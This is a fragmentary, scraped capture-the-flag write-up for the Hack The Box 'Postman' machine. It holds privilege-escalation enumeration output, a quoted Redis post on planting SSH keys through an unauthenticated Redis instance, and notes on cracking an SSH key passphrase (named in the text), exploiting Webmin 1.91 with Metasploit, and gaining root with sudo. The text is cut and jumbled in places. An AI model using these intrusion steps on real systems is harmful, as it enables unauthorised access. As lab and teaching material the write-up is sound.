-rw-r--r-- 1 root root 42 Jul 16 19:14 apache2-systemd.conf
/lib/systemd/system/halt.target.wants:
total 0
lrwxrwxrwx 1 root root 24 Apr 4 2019 plymouth-halt.service
-> ../plymouth-halt.service
/lib/systemd/system/initrd-switch-root.target.wants:
total 0
start.service -> ../plymouth-start.service
lrwxrwxrwx 1 root root 31 Apr 4 2019 plymouth-switch-
root.service -> ../plymouth-switch-root.service
/lib/systemd/system/kexec.target.wants:
total 0
kexec.service -> ../plymouth-kexec.service
/lib/systemd/system/multi-user.target.wants:
total 0
lrwxrwxrwx 1 root root 15 Jul 22 17:45 getty.target -> ../
getty.target
lrwxrwxrwx 1 root root 33 Jul 22 17:45 systemd-ask-
password-wall.path -> ../systemd-ask-password-wall.path
lrwxrwxrwx 1 root root 25 Jul 22 17:45 systemd-
logind.service -> ../systemd-logind.service
lrwxrwxrwx 1 root root 39 Jul 22 17:45 systemd-update-utmp-
runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 32 Jul 22 17:45 systemd-user-
sessions.service -> ../systemd-user-sessions.service
lrwxrwxrwx 1 root root 15 Jun 10 19:05 dbus.service -> ../
dbus.service
lrwxrwxrwx 1 root root 24 Apr 4 2019 plymouth-quit.service
47/59
-> ../plymouth-quit.service
lrwxrwxrwx 1 root root 29 Apr 4 2019 plymouth-quit-
wait.service -> ../plymouth-quit-wait.service
/lib/systemd/system/poweroff.target.wants:
total 0
poweroff.service -> ../plymouth-poweroff.service
/lib/systemd/system/reboot.target.wants:
total 0
reboot.service -> ../plymouth-reboot.service
/lib/systemd/system/sysinit.target.wants:
total 0
lrwxrwxrwx 1 root root 20 Jul 22 17:45 cryptsetup.target -
> ../cryptsetup.target
lrwxrwxrwx 1 root root 22 Jul 22 17:45 dev-
hugepages.mount -> ../dev-hugepages.mount
lrwxrwxrwx 1 root root 19 Jul 22 17:45 dev-mqueue.mount -
> ../dev-mqueue.mount
lrwxrwxrwx 1 root root 28 Jul 22 17:45 kmod-static-
nodes.service -> ../kmod-static-nodes.service
lrwxrwxrwx 1 root root 36 Jul 22 17:45 proc-sys-fs-
binfmt_misc.automount -> ../proc-sys-fs-
binfmt_misc.automount
lrwxrwxrwx 1 root root 32 Jul 22 17:45 sys-fs-fuse-
connections.mount -> ../sys-fs-fuse-connections.mount
lrwxrwxrwx 1 root root 26 Jul 22 17:45 sys-kernel-
config.mount -> ../sys-kernel-config.mount
lrwxrwxrwx 1 root root 25 Jul 22 17:45 sys-kernel-
debug.mount -> ../sys-kernel-debug.mount
lrwxrwxrwx 1 root root 36 Jul 22 17:45 systemd-ask-
password-console.path -> ../systemd-ask-password-
console.path
binfmt.service -> ../systemd-binfmt.service
48/59
lrwxrwxrwx 1 root root 30 Jul 22 17:45 systemd-hwdb-
update.service -> ../systemd-hwdb-update.service
journald.service -> ../systemd-journald.service
lrwxrwxrwx 1 root root 32 Jul 22 17:45 systemd-journal-
flush.service -> ../systemd-journal-flush.service
lrwxrwxrwx 1 root root 36 Jul 22 17:45 systemd-machine-id-
commit.service -> ../systemd-machine-id-commit.service
lrwxrwxrwx 1 root root 31 Jul 22 17:45 systemd-modules-
load.service -> ../systemd-modules-load.service
lrwxrwxrwx 1 root root 30 Jul 22 17:45 systemd-random-
seed.service -> ../systemd-random-seed.service
sysctl.service -> ../systemd-sysctl.service
lrwxrwxrwx 1 root root 37 Jul 22 17:45 systemd-tmpfiles-
setup-dev.service -> ../systemd-tmpfiles-setup-dev.service
setup.service -> ../systemd-tmpfiles-setup.service
udevd.service -> ../systemd-udevd.service
lrwxrwxrwx 1 root root 31 Jul 22 17:45 systemd-udev-
trigger.service -> ../systemd-udev-trigger.service
lrwxrwxrwx 1 root root 30 Jul 22 17:45 systemd-update-
utmp.service -> ../systemd-update-utmp.service
lrwxrwxrwx 1 root root 30 Apr 4 2019 plymouth-read-
write.service -> ../plymouth-read-write.service
start.service -> ../plymouth-start.service
/lib/systemd/system/getty.target.wants:
total 0
lrwxrwxrwx 1 root root 23 Jul 22 17:45 getty-static.service -
> ../getty-static.service
/lib/systemd/system/graphical.target.wants:
total 0
49/59
/lib/systemd/system/local-fs.target.wants:
total 0
lrwxrwxrwx 1 root root 29 Jul 22 17:45 systemd-remount-
fs.service -> ../systemd-remount-fs.service
/lib/systemd/system/rescue.target.wants:
total 0
/lib/systemd/system/sockets.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Jul 22 17:45 systemd-initctl.socket
-> ../systemd-initctl.socket
lrwxrwxrwx 1 root root 32 Jul 22 17:45 systemd-journald-
audit.socket -> ../systemd-journald-audit.socket
lrwxrwxrwx 1 root root 34 Jul 22 17:45 systemd-journald-dev-
log.socket -> ../systemd-journald-dev-log.socket
journald.socket -> ../systemd-journald.socket
lrwxrwxrwx 1 root root 31 Jul 22 17:45 systemd-udevd-
control.socket -> ../systemd-udevd-control.socket
lrwxrwxrwx 1 root root 30 Jul 22 17:45 systemd-udevd-
kernel.socket -> ../systemd-udevd-kernel.socket
lrwxrwxrwx 1 root root 14 Jun 10 19:05 dbus.socket -> ../
dbus.socket
/lib/systemd/system/timers.target.wants:
total 0
clean.timer -> ../systemd-tmpfiles-clean.timer
/lib/systemd/system/rc-local.service.d:
total 4.0K
-rw-r--r-- 1 root root 290 Jul 22 17:45 debian.conf
/lib/systemd/system/user@.service.d:
50/59
total 4.0K
-rw-r--r-- 1 root root 125 Jul 22 17:45 timeout.conf
/lib/systemd/system/runlevel1.target.wants:
total 0
total 0
total 0
total 0
total 0
/lib/systemd/system-generators:
total 200K
-rwxr-xr-x 1 root root 23K Jul 22 17:45 systemd-cryptsetup-
generator
-rwxr-xr-x 1 root root 10K Jul 22 17:45 systemd-debug-
generator
-rwxr-xr-x 1 root root 31K Jul 22 17:45 systemd-fstab-
generator
-rwxr-xr-x 1 root root 14K Jul 22 17:45 systemd-getty-
generator
-rwxr-xr-x 1 root root 26K Jul 22 17:45 systemd-gpt-auto-
generator
-rwxr-xr-x 1 root root 10K Jul 22 17:45 systemd-hibernate-
resume-generator
-rwxr-xr-x 1 root root 10K Jul 22 17:45 systemd-rc-local-
generator
-rwxr-xr-x 1 root root 10K Jul 22 17:45 systemd-system-
update-generator
-rwxr-xr-x 1 root root 31K Jul 22 17:45 systemd-sysv-
generator
51/59
-rwxr-xr-x 1 root root 14K Jul 22 17:45 systemd-veritysetup-
generator
-rwxr-xr-x 1 root root 286 Jun 21 15:07 friendly-recovery
/lib/systemd/system-sleep:
total 4.0K
-rwxr-xr-x 1 root root 92 Feb 22 2018 hdparm
/lib/systemd/network:
total 16K
-rw-r--r-- 1 root root 645 Jan 28 2018 80-container-
host0.network
-rw-r--r-- 1 root root 718 Jan 28 2018 80-container-
ve.network
-rw-r--r-- 1 root root 704 Jan 28 2018 80-container-vz.network
-rw-r--r-- 1 root root 412 Jan 28 2018 99-default.link
/lib/systemd/system-preset:
total 4.0K
-rw-r--r-- 1 root root 951 Jan 28 2018 90-systemd.preset
/lib/systemd/system-shutdown:
total 0
### SOFTWARE
#######################################
[-] Sudo version:
Sudo version 1.8.21p2
[-] Apache version:

Server version: Apache/2.4.29 (Ubuntu)
Server built: 2019-07-16T18:14:45
[-] Apache user configuration:

APACHE_RUN_USER=www-data
52/59
APACHE_RUN_GROUP=www-data
[-] Installed Apache modules:

Loaded Modules:
core_module (static)
so_module (static)
watchdog_module (static)
http_module (static)
log_config_module (static)
logio_module (static)
version_module (static)
unixd_module (static)
access_compat_module (shared)
actions_module (shared)
alias_module (shared)
auth_basic_module (shared)
authn_core_module (shared)
authn_file_module (shared)
authz_core_module (shared)
authz_host_module (shared)
authz_user_module (shared)
autoindex_module (shared)
deflate_module (shared)
dir_module (shared)
env_module (shared)
filter_module (shared)
mime_module (shared)
mpm_prefork_module (shared)
negotiation_module (shared)
php7_module (shared)
reqtimeout_module (shared)
rewrite_module (shared)
setenvif_module (shared)
status_module (shared)
ls### INTERESTING FILES

53/59
####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc
[-] Installed compilers:

ii g++ 4:7.4.0-1ubuntu2.3
amd64 GNU C++ compiler
ii g++-7
7.4.0-1ubuntu1~18.04.1 amd64 GNU C++
compiler
ii gcc 4:7.4.0-1ubuntu2.3
amd64 GNU C compiler
ii gcc-7 7.4.0-1ubuntu1~18.04.1
amd64 GNU C compiler
[-] Can we read/write sensitive files:

-rw-r--r-- 1 root root 1382 Aug 25 23:48 /etc/passwd
-rw-r--r-- 1 root root 709 Oct 25 16:38 /etc/group
-rw-r--r-- 1 root root 581 Apr 9 2018 /etc/profile
-rw-r----- 1 root shadow 935 Aug 26 03:50 /etc/shadow
[-] SUID files:

-rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/
ssh-keysign
-rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/
dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 42992 Jun 10 19:05 /usr/lib/
dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 149080 Jan 18 2018 /usr/bin/sudo
-rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn
54/59
-rwsr-xr-x 1 root root 18448 Jun 28 12:05 /usr/bin/
traceroute6.iputils
-rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 26696 Oct 15 2018 /bin/umount
-rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
-rwsr-xr-x 1 root root 64424 Jun 28 12:05 /bin/ping
-rwsr-xr-x 1 root root 43088 Oct 15 2018 /bin/mount
[-] SGID files:

-rwxr-sr-x 1 root shadow 34816 Feb 27 2019 /sbin/
pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 34816 Feb 27 2019 /sbin/
unix_chkpwd
-rwxr-sr-x 1 root shadow 22808 Mar 22 2019 /usr/bin/expiry
-rwxr-sr-x 1 root crontab 39352 Nov 16 2017 /usr/bin/crontab
-rwxr-sr-x 1 root ssh 362640 Mar 4 2019 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mlocate 43088 Mar 1 2018 /usr/bin/mlocate
-rwxr-sr-x 1 root tty 14328 Jan 17 2018 /usr/bin/bsd-write
-rwxr-sr-x 1 root tty 30800 Oct 15 2018 /usr/bin/wall
-rwxr-sr-x 1 root shadow 71816 Mar 22 2019 /usr/bin/chage
[+] Files with POSIX capabilities set:

/usr/bin/mtr-packet = cap_net_raw+ep
[-] Can't search *.conf files as no keyword was entered
[-] Can't search *.php files as no keyword was entered
[-] Can't search *.log files as no keyword was entered
[-] Can't search *.ini files as no keyword was entered
[-] All *.conf files in /etc (recursive 1 level):

55/59
-rw-r--r-- 1 root root 2683 Jan 17 2018 /etc/sysctl.conf
-rw-r--r-- 1 root root 703 Aug 21 2017 /etc/logrotate.conf
-rw-r--r-- 1 root root 1260 Feb 26 2018 /etc/ucf.conf
-rw-r--r-- 1 root root 191 Feb 7 2018 /etc/libaudit.conf
-rw-r--r-- 1 root root 2969 Feb 28 2018 /etc/debconf.conf
-rw-r--r-- 1 root root 552 Apr 4 2018 /etc/pam.conf
-rw-r--r-- 1 root root 144 Aug 24 11:35 /etc/kernel-img.conf
-rw-r--r-- 1 root root 4861 Feb 22 2018 /etc/hdparm.conf
-rw-r--r-- 1 root root 92 Apr 9 2018 /etc/host.conf
-rw-r--r-- 1 root root 280 Jun 20 2014 /etc/fuse.conf
-rw-r--r-- 1 root root 1358 Jan 30 2018 /etc/rsyslog.conf
-rw-r--r-- 1 root root 403 Mar 1 2018 /etc/updatedb.conf
-rw-r--r-- 1 root root 350 Aug 24 11:33 /etc/popularity-
contest.conf
-rw-r--r-- 1 root root 5898 Aug 24 11:27 /etc/ca-
certificates.conf
-rw-r--r-- 1 root root 2584 Feb 1 2018 /etc/gai.conf
-rw-r--r-- 1 root root 513 Aug 24 11:27 /etc/nsswitch.conf
-rw-r--r-- 1 root root 14867 Oct 13 2016 /etc/ltrace.conf
-rw-r--r-- 1 root root 3028 Aug 24 11:26 /etc/adduser.conf
-rw-r--r-- 1 root root 604 Aug 13 2017 /etc/deluser.conf
-rw-r--r-- 1 root root 34 Jan 27 2016 /etc/ld.so.conf
-rw-r--r-- 1 root root 812 Mar 24 2018 /etc/mke2fs.conf
[-] Current user's history files:

-rw------- 1 redis redis 399 Oct 25 14:43 /var/lib/
redis/.bash_history
[-] Location and contents (if accessible) of .bash_history

file(s):
/home/Matt/.bash_history
[-] Any interesting mail in /var/mail:

total 8
drwxrwsr-x 2 root mail 4096 Aug 24 11:24 .
56/59
drwxr-xr-x 13 root root 4096 Aug 25 18:24 ..
57/59
ssh
we got ssh private key for the user (matt) from /opt
we need passphrase to login as user through ssh
private key is hashed using ssh2john and then using rockyou

and john-the-ripper we got the passphrase computer2008
This passpharse does not work for ssh
but the username and password is same for webmin..
58/59
Webmin
until now we have the password of user account for webmin
webmin 1.91 is vuln remote command execution ,so we can

get user shell from here
use metasploit to get the user shell ,(change the ssl to true)
and we get the user shell
and root shell turned out to be very simple , just "sudo -i" in
the webmin dir
59/59

HTB - CTB POSTMAN

Încărcat de

Informații document

Titlu original

Drepturi de autor

Formate disponibile

Partajați acest document

Partajați sau inserați document

Opțiuni de partajare

Vi se pare util acest document?

Este necorespunzător acest conținut?

Drepturi de autor:

Formate disponibile

HTB - CTB POSTMAN

Încărcat de

Drepturi de autor:

Formate disponibile

Postman

root 3503 0.0 0.9 33400 9120 ? S 06:49 0:00

Service detection performed. Please report any incorrect

Service detection performed. Please report any incorrect

How important is a given security layer in a system depends

The Redis security model is: “it’s totally insecure to let

The problem is that, whatever we state in our security page,

In order to show the Redis “security model” in a cruel way, I

So my experiment was the following: I’ll run a Redis instance

So, to start let’s check if I can access the instance, which is a

$ telnet 192.168.1.11 6379

Let’s start generating a new SSH key:

$ ssh-keygen -t rsa -C "crack@redis.io"

Now I’ve a key. My goal is to put it into the Redis server

$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

$ redis-cli -h 192.168.1.11 flushall

Looks good. How to dump our memory content into the

At this point the target authorized keys file should be full of

$ ssh -i id_rsa antirez@192.168.1.11

How to fix this crap?

We say Redis is insecure if exposed, and the security model

Let’s make an example. Newer versions of Redis ship with

However this measures are not very effective, because

Basically the problem is finding a compromise between the

1. Making Redis accessible without annoyances for people

2. Making Redis less insecure for people that don’t know

3. My bias towards “1” instead of “2” because RTFM.

Users ACLs to mitigate the problem

One way to add redundancy to the “isolation” concept of

While this is not resistant against people sniffing your TCP

A few notes about AUTH:

1. You can use Redis as an oracle in order to test many

2. AUTH is sent when the connection is created, and most

3. It’s a good layer of protection even for well sandboxed

Maybe evolving AUTH is the right path in order to gain more

ACLs, while not perfect, have certain advantages. When

Basically it is impossible to reach the goal of making Redis

Moreover ACLs have the advantage of allowing application

A drawback of even this simple layer of security is that it

Hacker News: http://antirez.com/news/96

[-] Debug Info

Scan started at:

[-] Kernel information (continued):

[-] Specific release information:

[-] Users that have previously logged onto the system:

[-] Who else is logged on:

[-] Group memberships:

[-] Contents of /etc/passwd:

[-] Are permissions on /home directories lax:

[-] Root is allowed to login via SSH:

[-] Path information:

[-] Available shells:

[-] Current umask value:

[-] umask value as specified in /etc/login.defs:

[-] Password and storage information:

[-] Crontab contents:

# m h dom mon dow user command

[-] Systemd timers:

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536

[-] ARP history:

[-] Default route:

[-] Listening TCP:

[-] Process binaries and associated permissions (from above